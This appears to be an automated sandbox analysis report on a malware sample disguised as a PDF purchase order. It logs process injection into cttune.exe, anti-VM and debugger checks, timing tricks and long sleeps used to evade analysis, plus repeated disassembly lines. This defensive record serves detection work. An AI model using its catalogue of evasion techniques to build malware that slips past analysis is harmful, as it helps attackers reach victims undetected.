Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO-0005082025 pdf.exe PID: 7284, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\cttune.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Memory allocated: 1440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Memory allocated: 8050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Memory allocated: 9050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Memory allocated: 9200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Memory allocated: A200000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Code function: 6_2_0198096E rdtsc

6_2_0198096E

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5534	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1249	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Window / User API: threadDelayed 3212	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Window / User API: threadDelayed 6761	Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\cttune.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe TID: 7304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7608	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe TID: 8144	Thread sleep count: 3212 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe TID: 8144	Thread sleep time: -6424000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe TID: 8144	Thread sleep count: 6761 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe TID: 8144	Thread sleep time: -13522000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe TID: 8176	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cttune.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cttune.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\cttune.exe

Code function: 11_2_0324C870 FindFirstFileW,FindNextFileW,FindClose,

11_2_0324C870

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: cttune.exe, 0000000B.00000002.2977024809.00000000032BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU%p
Source: VuOkdnWJwVVuK.exe, 0000000C.00000002.2978403044.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 0000000D.00000002.2594718445.000001C5CD23C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Code function: 6_2_0198096E rdtsc

6_2_0198096E

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Code function: 6_2_00417EB3 LdrLoadDll,

6_2_00417EB3

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C019F mov eax, dword ptr fs:[00000030h]	6_2_019C019F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C019F mov eax, dword ptr fs:[00000030h]	6_2_019C019F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C019F mov eax, dword ptr fs:[00000030h]	6_2_019C019F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C019F mov eax, dword ptr fs:[00000030h]	6_2_019C019F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193A197 mov eax, dword ptr fs:[00000030h]	6_2_0193A197
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193A197 mov eax, dword ptr fs:[00000030h]	6_2_0193A197
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193A197 mov eax, dword ptr fs:[00000030h]	6_2_0193A197
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FC188 mov eax, dword ptr fs:[00000030h]	6_2_019FC188
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FC188 mov eax, dword ptr fs:[00000030h]	6_2_019FC188
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01980185 mov eax, dword ptr fs:[00000030h]	6_2_01980185
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E4180 mov eax, dword ptr fs:[00000030h]	6_2_019E4180
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E4180 mov eax, dword ptr fs:[00000030h]	6_2_019E4180
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A161E5 mov eax, dword ptr fs:[00000030h]	6_2_01A161E5
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE1D0 mov eax, dword ptr fs:[00000030h]	6_2_019BE1D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE1D0 mov eax, dword ptr fs:[00000030h]	6_2_019BE1D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE1D0 mov ecx, dword ptr fs:[00000030h]	6_2_019BE1D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE1D0 mov eax, dword ptr fs:[00000030h]	6_2_019BE1D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019BE1D0 mov eax, dword ptr fs:[00000030h]	6_2_019BE1D0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A061C3 mov eax, dword ptr fs:[00000030h]	6_2_01A061C3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A061C3 mov eax, dword ptr fs:[00000030h]	6_2_01A061C3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019701F8 mov eax, dword ptr fs:[00000030h]	6_2_019701F8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EA118 mov ecx, dword ptr fs:[00000030h]	6_2_019EA118
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EA118 mov eax, dword ptr fs:[00000030h]	6_2_019EA118
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EA118 mov eax, dword ptr fs:[00000030h]	6_2_019EA118
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EA118 mov eax, dword ptr fs:[00000030h]	6_2_019EA118
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov eax, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov ecx, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov eax, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov eax, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov ecx, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov eax, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov eax, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov ecx, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov eax, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE10E mov ecx, dword ptr fs:[00000030h]	6_2_019EE10E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01970124 mov eax, dword ptr fs:[00000030h]	6_2_01970124
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A00115 mov eax, dword ptr fs:[00000030h]	6_2_01A00115
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946154 mov eax, dword ptr fs:[00000030h]	6_2_01946154
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01946154 mov eax, dword ptr fs:[00000030h]	6_2_01946154
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193C156 mov eax, dword ptr fs:[00000030h]	6_2_0193C156
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D8158 mov eax, dword ptr fs:[00000030h]	6_2_019D8158
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D4144 mov eax, dword ptr fs:[00000030h]	6_2_019D4144
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D4144 mov eax, dword ptr fs:[00000030h]	6_2_019D4144
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D4144 mov ecx, dword ptr fs:[00000030h]	6_2_019D4144
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D4144 mov eax, dword ptr fs:[00000030h]	6_2_019D4144
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D4144 mov eax, dword ptr fs:[00000030h]	6_2_019D4144
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A060B8 mov eax, dword ptr fs:[00000030h]	6_2_01A060B8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A060B8 mov ecx, dword ptr fs:[00000030h]	6_2_01A060B8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194208A mov eax, dword ptr fs:[00000030h]	6_2_0194208A
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D80A8 mov eax, dword ptr fs:[00000030h]	6_2_019D80A8
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C20DE mov eax, dword ptr fs:[00000030h]	6_2_019C20DE
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0193C0F0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019820F0 mov ecx, dword ptr fs:[00000030h]	6_2_019820F0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0193A0E3
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C60E0 mov eax, dword ptr fs:[00000030h]	6_2_019C60E0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019480E9 mov eax, dword ptr fs:[00000030h]	6_2_019480E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E016 mov eax, dword ptr fs:[00000030h]	6_2_0195E016
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E016 mov eax, dword ptr fs:[00000030h]	6_2_0195E016
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E016 mov eax, dword ptr fs:[00000030h]	6_2_0195E016
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E016 mov eax, dword ptr fs:[00000030h]	6_2_0195E016
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C4000 mov ecx, dword ptr fs:[00000030h]	6_2_019C4000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000 mov eax, dword ptr fs:[00000030h]	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000 mov eax, dword ptr fs:[00000030h]	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000 mov eax, dword ptr fs:[00000030h]	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000 mov eax, dword ptr fs:[00000030h]	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000 mov eax, dword ptr fs:[00000030h]	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000 mov eax, dword ptr fs:[00000030h]	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000 mov eax, dword ptr fs:[00000030h]	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E2000 mov eax, dword ptr fs:[00000030h]	6_2_019E2000
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019D6030 mov eax, dword ptr fs:[00000030h]	6_2_019D6030
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193A020 mov eax, dword ptr fs:[00000030h]	6_2_0193A020
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193C020 mov eax, dword ptr fs:[00000030h]	6_2_0193C020
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01942050 mov eax, dword ptr fs:[00000030h]	6_2_01942050
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C6050 mov eax, dword ptr fs:[00000030h]	6_2_019C6050
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196C073 mov eax, dword ptr fs:[00000030h]	6_2_0196C073
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01938397 mov eax, dword ptr fs:[00000030h]	6_2_01938397
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01938397 mov eax, dword ptr fs:[00000030h]	6_2_01938397
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01938397 mov eax, dword ptr fs:[00000030h]	6_2_01938397
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196438F mov eax, dword ptr fs:[00000030h]	6_2_0196438F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0196438F mov eax, dword ptr fs:[00000030h]	6_2_0196438F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193E388 mov eax, dword ptr fs:[00000030h]	6_2_0193E388
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193E388 mov eax, dword ptr fs:[00000030h]	6_2_0193E388
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193E388 mov eax, dword ptr fs:[00000030h]	6_2_0193E388
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE3DB mov eax, dword ptr fs:[00000030h]	6_2_019EE3DB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE3DB mov eax, dword ptr fs:[00000030h]	6_2_019EE3DB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE3DB mov ecx, dword ptr fs:[00000030h]	6_2_019EE3DB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019EE3DB mov eax, dword ptr fs:[00000030h]	6_2_019EE3DB
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E43D4 mov eax, dword ptr fs:[00000030h]	6_2_019E43D4
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E43D4 mov eax, dword ptr fs:[00000030h]	6_2_019E43D4
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019FC3CD mov eax, dword ptr fs:[00000030h]	6_2_019FC3CD
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0194A3C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0194A3C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0194A3C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0194A3C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0194A3C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0194A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0194A3C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019483C0 mov eax, dword ptr fs:[00000030h]	6_2_019483C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019483C0 mov eax, dword ptr fs:[00000030h]	6_2_019483C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019483C0 mov eax, dword ptr fs:[00000030h]	6_2_019483C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019483C0 mov eax, dword ptr fs:[00000030h]	6_2_019483C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C63C0 mov eax, dword ptr fs:[00000030h]	6_2_019C63C0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0195E3F0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0195E3F0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0195E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0195E3F0
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019763FF mov eax, dword ptr fs:[00000030h]	6_2_019763FF
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019503E9 mov eax, dword ptr fs:[00000030h]	6_2_019503E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019503E9 mov eax, dword ptr fs:[00000030h]	6_2_019503E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019503E9 mov eax, dword ptr fs:[00000030h]	6_2_019503E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019503E9 mov eax, dword ptr fs:[00000030h]	6_2_019503E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019503E9 mov eax, dword ptr fs:[00000030h]	6_2_019503E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019503E9 mov eax, dword ptr fs:[00000030h]	6_2_019503E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019503E9 mov eax, dword ptr fs:[00000030h]	6_2_019503E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019503E9 mov eax, dword ptr fs:[00000030h]	6_2_019503E9
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0193C310 mov ecx, dword ptr fs:[00000030h]	6_2_0193C310
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01960310 mov ecx, dword ptr fs:[00000030h]	6_2_01960310
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A30B mov eax, dword ptr fs:[00000030h]	6_2_0197A30B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A30B mov eax, dword ptr fs:[00000030h]	6_2_0197A30B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197A30B mov eax, dword ptr fs:[00000030h]	6_2_0197A30B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C035C mov eax, dword ptr fs:[00000030h]	6_2_019C035C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C035C mov eax, dword ptr fs:[00000030h]	6_2_019C035C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C035C mov eax, dword ptr fs:[00000030h]	6_2_019C035C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C035C mov ecx, dword ptr fs:[00000030h]	6_2_019C035C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C035C mov eax, dword ptr fs:[00000030h]	6_2_019C035C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C035C mov eax, dword ptr fs:[00000030h]	6_2_019C035C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E8350 mov ecx, dword ptr fs:[00000030h]	6_2_019E8350
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019C2349 mov eax, dword ptr fs:[00000030h]	6_2_019C2349
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019E437C mov eax, dword ptr fs:[00000030h]	6_2_019E437C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_01A0A352 mov eax, dword ptr fs:[00000030h]	6_2_01A0A352
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E284 mov eax, dword ptr fs:[00000030h]	6_2_0197E284
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0197E284 mov eax, dword ptr fs:[00000030h]	6_2_0197E284
